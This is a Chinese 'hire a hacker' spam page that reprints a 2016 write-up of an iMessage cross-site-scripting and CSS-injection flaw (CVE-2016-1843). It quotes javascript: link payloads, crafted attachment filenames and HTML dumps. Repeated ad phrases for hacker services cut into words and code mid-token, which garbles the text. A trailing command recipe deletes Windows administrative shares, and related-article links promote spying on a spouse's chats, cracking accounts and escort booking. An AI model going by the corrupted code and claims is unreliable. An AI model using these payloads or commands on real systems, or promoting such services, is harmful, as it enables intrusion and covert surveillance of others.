找黑客平台

*** 黑 *** 务项目收费标准-怎样才能找黑客帮忙-从老漏洞到新漏洞:iMessage 0day(CVE-2016-1843)挖掘实录

hacker4年前黑客工具260

怎样才能找黑客帮忙-从老漏洞到新漏洞:iMessage 0day(CVE-2016-1843)挖掘实录

文/SuperHei(知道创宇404室验室) 2016.4.11

注:文章内容里“0day”在汇报给官方网后分派漏洞序号:CVE-2016-1843


一、情况

在前几日外国人公布了一个在三月升级里恢复的iMessage xss漏洞(CVE-20 *** 黑 *** 务项目收费标准16-1764)关键点 :

https://www.bishopfox.com/blog/2016/04/if-you-cant-break-crypto-break-the-client-recovery-of-plaintext-imessage-data/

https://github.com/BishopFox/cve-2016-1764

她们发布这种关键点里实际上沒有得出详尽开启点的剖析,我剖析后也就是依据这种信息内容发觉了一个新的0day。


二、CVE-2016-1764 漏洞剖析

CVE-2016-1764 里的非常简单的开启payload: javascript://a/research? prompt(1) 能够看得出这个是很显著javascript协议书里的一个小窍门 \r%0 没解决后造成 的 xss ,这一tips在找xss漏洞里是较为普遍的。

这一非常值得提一下的是 为什么得用prompt(1) 而大家常见的是alert(1) ,我具体检测了下发觉alert的确没法弹出窗口,此外在许多 的网址实际上把alert立即和睦过虑了,因此 这儿给提示大伙儿的是在检测xss的情况下,把 prompt 更换 alert 是必须的~

碰到那样的手机客户端的xss假如要剖析,之一步应当看一下location.href的信息内容。这一主要是看是哪个域下,这一 *** 黑 *** 务项目收费标准漏洞是在applewebdata://协议书下,这一原漏洞剖析里有得出。随后需看实际的开启点,一般在浏览器下我们可以根据看html源码来剖析,可是在手机客户端下一般看不见,因此 这儿采用一个小窍门:

1

javascript://a/research? prompt(1,document.head.innerHTML)

这儿是看html里的head编码

1

*** 黑 *** 务项目收费标准 <style>@media screen and (-webkit-device-pixel-ratio:2) {}</style><link rel="stylesheet" type="text/css" href="file:///System/Library/PrivateFrameworks/SocialUI.framework/Resources/balloons-modern.css">

继续看下body的编码:

 

1

2

3

4

5

6

*** 黑 *** 务项目收费标准 7

8

9

10

javascript://a/research? prompt(1,document.body.innerHTML)

*** 黑 *** 务项目收费标准 *** 黑 *** 务项目收费标准 <chatitem id="v:iMessage/xxx@xxx.com/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" role="heading" aria-level="1" item-type=& *** 黑 *** 务项目收费标准 quot;header"><header guid="v:iMessage/xxx@xxx.com/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"><headermessage text-direction="ltr">与“xxx@xxx.com”开展 iMessage 通讯</headermessage></header></chatitem><chatitem id="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" role="heading" aria-level="2" item-type="timestamp"><timestamp guid="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" id="d:E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx"><date date="481908183.907740">今日 23:23</date></timestamp></chatitem><chatitem id="p:0/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-last-message-ignore-timestamps="yes" group-first-message-ignore-timestamps="yes"><message guid="p:0/E4BCBB48-9286-49EC-BA1D-xxxxxxxxxxxx" service="imessage" typing-indicator="no" sent="no" from-me="yes" from-system="no" from="B392EC10-CA04-41D3-A967-5BB95E301475" emote="no" played="no" auto-reply="no" group-last-message="yes" *** 黑 *** 务项目收费标准  group-first-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今日 23:23:03" aria-label="javascript://a/research? prompt(1,document.body.innerHTML)"><messagetextcontainer text-direction="ltr"><span style=""><a href=" " title="javascript://a/research?  

*** 黑 *** 务项目收费标准 *** 黑 *** 务项目收费标准 prompt(1,document.body.innerHTML)">

*** 黑 *** 务项目收费标准 *** 黑 *** 务项目收费标准 javascript://a/research? prompt(1,document.body.innerHTML)</a ></span></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="9a55-bfcf-fee2-0a23 compact"></date></message><spacer></spacer></chatitem><chatitem id="p:0/64989837-6626-44CE-A689-5460313DC817" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-first-message-ignore-timestamps="yes"& nbsp;group-last-message-ignore-timestamps="yes"><message guid="p:0/64989837-6626-44CE-A689-5460313DC817" typing-indicator="no" sent="no" from-me="no" from-system="no" from="D8FAE154-6C88-4FB6-9D2D-0C234BEA8E99" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 23:23:03" aria-label="javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)"><messagetextcontainer text-direction="ltr"><span style=""><a href="javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)" title="javascript://a/research?  

黑 *** 务收费标准 黑 *** 务收费标准 黑 *** 务收费标准 prompt(1,document.body.innerHTML)">

黑 *** 务收费标准javascript://a/research?%0d%0aprompt(1,document.body.innerHTML)</a ></span></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="bfcf-fee2-0a23-75f1 compact"></date></message><spacer></spacer></黑 *** 务收费标准 chatitem><chatitem id="p:0/AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-last-message-ignore-timestamps="yes" group-first-message-ignore-timestamps="yes"><message guid="p:0/AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" service="imessage" typing-indicator="no" sent="no" from-me="yes" from-system="no" from="B392EC10-CA04-41D3-A967-5BB95E301475" emote="no" played="no" auto-reply="no" group-last-message="yes" group-first-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 23:24:51" aria-label="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)"><messagetextcontainer text-direction="ltr"><span style=""><a href="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)" title="javascript://a/research?  

黑 *** 务收费标准 黑 *** 务收费标准 prompt(1,document.head.innerHTML)">

黑 *** 务收费标准 黑 *** 务收费标准 黑 *** 务收费标准 javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)</a ></span></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="fee2-0a23-75f1-e0fb compact"></date></message><spacer></spacer></chatitem><chatitem id="s:AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" contiguous="no" role="heading" aria-level="1" item-type="status" receipt-fade="in"><receipt from-me="YES" id="receipt-delivered-s:ae1abcf1-2397-4f20-a71f-d71ffe8042f5"><div class="be8c-8bbe-fcc0-fb3f receipt-container"><div class="8bbe-fcc0-fb3f-89c7 receipt-item">已送达</div></div></receipt></chatitem><chatitem id="p:0/43545678-5DB7-4B35-8B81-xxxxxxxxxxxx" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="黑 *** 务收费标准yes"><message guid="p:0/43545678-5DB7-4B35-8B81-xxxxxxxxxxxx" typing-indicator="no" sent="no" from-me="no" from-system="no" from="D8FAE154-6C88-4FB6-9D2D-0C234BEA8E99" emote="no" played="no" auto-reply="no" group-first-message=黑 *** 务收费标准"yes" group-last-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 23:24:51" aria-label="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)"><messagetextcontainer text-direction="ltr"><span style=""><a href="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)" title="javascript://a/research?  

黑 *** 务收费标准 prompt(1,document.head.innerHTML)">

javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)</a ></黑 *** 务收费标准span></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="fcc0-fb3f-89c7-73e8 compact"></date></message><spacer></spacer></chatitem>

那么关键的触发点:

 

1

2

黑 *** 务收费标准 <a href="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)" title="javascript://a/research?  

prompt(1,document.head.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)</a >

就是这个了。 javascript直接进入a标签里的href,导致点击执行。新版本的修复方案是直接不解析javascript:// 。


三、从老漏洞(CVE-2016-1764)到0day

XSS的漏洞本质是你注入的代码最终被解析执行了,既然我们看到了document.head.innerHTML的情况,那么有没有其他注入代码的机会呢?首先我测试的肯定是还是那个点,尝试用"及<>去闭合,可惜都被过滤了,这个点不行我们可以看看其他存在输入的点,于是我尝试发个附件看看解析情况,部分代码如下:

1

黑 *** 务收费标准黑 *** 务收费标准<chatitem id="p:0/FE98E898-0385-41E6黑 *** 务收费标准 -933F-8E87DB10AA7E" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="attachment" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes"><message guid="p:0/FE98E898-0385-41E6-93黑 *** 务收费标准 3F-8E87DB10AA7E" typing-indicator="no" sent="no" from-me="no" from-system="no" from="D8FAE154-6C88-4FB6-9D2D-0C234BEA8E99" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 23:34:41" file-transfer-element="yes" aria-label="文件传输: tttt.html"><messagetextcontainer text-direction="ltr"><transfer class="fb3f-89c7-73e8-3c39 transfer" id="45B8E6BD-9826-47E2-B910-D584CE461E5F" guid="45B8E6BD-9826-47E2-B910-D584CE461E5F"><transfer-atom draggable="true" aria-label="tttt.html" id="45B8E6BD-9826-47E2-B910-D584CE461E5F" guid="45B8E6BD-9826-47E2-B910-D584CE461E5F">< img class="89c7-73e8-3c39-87e5 transfer-icon" extension="html" aria-label="文件扩展名: html" style="content: -webkit-image-set(url(transcript-resource://iconpreview/html/16) 1x, url(transcript-resource://iconpreview/html-2x/16) 2x);"><span class="73e8-3c39-87e5-abd5 transfer-text" color-important="no">tttt</span></transfer-atom><div class="3c39-87e5-abd5-743d transfer-button-container">< img class="87e5-abd5-743d-504f transfer-button-reveal" aria-label="显示" id="filetransfer-button-45B8E6BD-9826-47E2-B910-D584CE461E5F" role="button"></div></transfer></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="abd5-743d-504f-e37c compact"></date></message><spacer></spacer></chatitem>

发了个tttt.html的附件,这个附件的文件名出现在代码里,或许有控制的机会。多长测试后发现过滤也比较严格,不过最终还是发现一个潜在的点,也就是文件名的扩展名部分:

黑 *** 务收费标准 黑 *** 务收费标准 黑 *** 务收费标准 1

黑 *** 务收费标准 黑 *** 务收费标准 黑 *** 务收费标准 黑 *** 务收费标准 <chatitem id="p:0/D4591950-20AD-44F8-80A1-E65911DCBA22" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="attachment" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes"><message guid="p:0/D4591950-20AD-44F8-80A1-E65911DCBA22" typing-indicator="no" sent="no" from-me="no" from-system="no" from="93D2D530-0E94-4CEB-A41E-2F21DE32715D" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes"><buddyicon role="img" aria-label="黑哥"><div></div></buddyicon><messagetext><messagebody title="今天 16:46:10" file-transfer-element="yes" aria-label="文件传输: testzzzzzzz&quot;'&gt;&lt;img src=1&gt;.htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d"><messagetextcontainer text-direction="ltr"><transfer class="743d-504f-e37c-9a55 transfer" id="A6BE6666-ADBF-4039-BF45-042D261EA458" guid="A6BE6666-ADBF-4039-BF45-042D261EA458"><transfer-atom draggable="true" aria-label="testzzzzzzz&quot;'&gt;&lt;img src=1&gt;.htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d" id="A6BE6666-ADBF-4039-BF45-042D261EA458" guid="A6BE6666-ADBF-4039-BF45-042D261EA458">< img class="504f-e37c-9a55-bfcf transfer-icon" extension="htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d" aria-label="文件扩展名: htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d" style="content: -webkit-image-set(黑 *** 务收费标准 url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d/16) 1x, url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d-2x/16) 2x);"><span class="e37c-9a55-bfcf-fee2 transfer-text" color-important="no">testzzzzzzz"'&gt;&lt;img src=1&gt;</span></transfer-黑 *** 务收费标准atom><div class="9a55-bfcf-fee2-0a23 transfer-button-container">< img class="bfcf-fee2-0a23-75f1 transfer-button-reveal" aria-label="显示" id="filetransfer-button-A6BE6666-ADBF-4039-BF45-042D261EA458" role="button"></div></transfer></messagetextcontainer></messagebody><message-overlay></message-overlay></messagetext><date class="fee2-0a23-75f1-e0fb compact"></date></message><spacer></spacer></chatitem>

我们提交的附件的后缀进入了style 黑 *** 务收费标准黑 *** 务收费标准 :

1

黑 *** 务收费标准 style="content: -webkit-image-set(url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d/16) 1x, url(transcript-resource://iconpreview/htm::16) 1x, (aaa\\\\\\\\\\\%0a%0d-2x/16) 2x);

也就是可能导致css注入,或许我们还有机会,不过经过测试也是有过滤处理的,比如/ 直接被转为了:这个非常有意思 所谓“成也萧何,败也萧何”,如果你要注入css那么肯定给属性给值就得用: 但是:又不能出现在文件名里,然后我们要注入css里掉用远程css或者图片需要用/ 而/又被处理了变成了:

不管怎么样我先注入个css测试下,于是提交了一附件名:

1

黑 *** 务收费标准  zzzzzz.htm) 1x);color/red;aaa/((

按推断/变为了: 如果注入成功应该是

1

style="content: -webkit-image-set(url(transcript-resource://iconpreview/htm::16) 1x);color:red;aaa:((

当我提交测试发送这个附件的时候,我的iMessage 崩溃了~~ 这里我想我发现了一个新的漏洞,于是我升级OSX到最新的系统重新测试结果:一个全新的0day诞生!


四、后记

当然这里还有很多地方可以测试,也有一些思路也可以去测试下,比如那个名字那里这个应该是可控制的,比如附件是保存在本地的有没有可能存在目录专挑导致写到任意目录的地方。有需求的可以继续测试下,说不定下个0day就是你的 :)

最后我想说的是在分析别人发现的漏洞的时候一定要找到漏洞的关键,然后总结提炼出“模型”,然后去尝试新的攻击思路或者界面!


参考链接

https://www.seebug.org/vuldb/ssvid-92471

打开记事本,输入以下内容:netshareC$/delnetshareD$/delnetshareE$/delnetshareF$/delnetshareG$/del(没有这些分区就。怎么才能找黑客帮忙

韩国 *** 靠什么赚钱晓得什么是黑客不?不过不同的书里对黑客的定义也是有不同的,像我看过的《黑客与画家》,黑客就分两类:1、擅长解决问题的程序员;2、入侵他们电脑的人。

怎么才能找黑客帮忙黑客其实分两种:黑客&骇客,二者都是计算机的高手,但是各自的目的不同.黑客一般是以不断追求更高的计算机技术为目的的,有时他们也会为 *** 安全义务检测。

特洛伊木马(trojanhorse)简称“木马”,据说这个名称来源于希黑 *** 务收费标准腊神话《木马屠城记》。古希腊有大军围攻特洛伊城,久久无法攻下。于是有人献计制造一只高二丈。

黑客?对自己的技术有非常的自信,时刻保持着一个上进的心。然而事实却是,你即使见到了,在没有让他们心动的条件或理由下,人家也不会帮你。更。怎么才能找黑客帮忙

还是得从长远的角度考虑,学一些能跟得上时代的步伐的技术,比如互联网相关专业。像是大数据、 *** 运营、电子商务等专业,以后只能越来越吃香的。

怎么才能找黑客帮忙红黑联盟红客联盟唉你到黑客榜中榜看下多的不行还有许多高手的博客精华!百度:黑客榜中榜我们说黑客过关游戏是一项测试大家细心、观察力、编程能力、软件破解能力和大家的见多识广!好今天我就拿?中国x黑客小组的过关游戏为例给大家讲解一下。
返回列表

上一篇:淘宝优惠券微信群群主怎么赚钱?

下一篇:货币出钱找黑客-在哪里可以找到网络黑客(北京黑客高手在哪里可以找到)

相关文章

qq空间相册破解,黑客找苹果,wangle输钱找黑客可以吗

经测验,GET、、COOKIE均有用,彻底bypass  6)意外发现一般在企业中职工薪酬都被视为秘要,这太让人心痒痒了,我内心里总有一种激动想要知道搭档们究竟赚多少钱,尽管更多的时分知道真相会不爽,...

怎样可以接收老婆同步监控聊天记录记录删除怎么恢复手机通话网上怎么查

怎样可以接收老婆同步监控聊天记录记录删除怎么恢复手机通话网上怎么查一维随机变量期待与标准差 二维随机变量期待与标准差 协方差矩阵 1.一维随机变量期待与标准差: 公式计算: 离散型: E(...

内衣文案:我的舒适没有圈

内衣文案:我的舒适没有圈

这6句亵服文案,真悦目! 「最好的爱,不是约束互相,而是彼此扶持。」 这条舒吃法例,同样合用于亵服。 许多时候,亵服就像一个金箍圈。穿上则意味着束缚,这跟女生们想要的「舒服」南辕北辙。 为此,Ubr...

逝者如斯夫什么意思逝【者如斯夫到底说的是啥】

逝者如斯夫什么意思(逝者如斯夫到底说的是啥)   逝者如斯夫啥意思(逝者如斯夫究竟说的是啥)大家常常讲,“一千个人眼里有一千个哈姆莱特 ” ,古代中国也是有叫法叫“诗无达诂”,意思是说对《诗经》的表...

坚守 作文(关于坚守的作文5篇)

坚守 作文(关于坚守的作文5篇) 谢谢你的坚守 你,是坚守在大漠的文物修复者,是 敦煌的女儿。谢谢你,樊锦诗,在敦煌文 化遗失的边缘坚守,在快捷功利的繁荣里 坚持。 从凉州词里飞出的苍鹰在苍...

预定上海市高档伴游平台网址通道【沈凤美】

预定上海市高档伴游模特平台网址通道【沈凤美】 今日给大伙儿共享的內容是“预定上海市高档伴游模特平台网址通道【沈凤美】”,我是沈凤美,来源于大足县,2020年25岁,做为岗位:一般人力资本/家政保洁,我...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.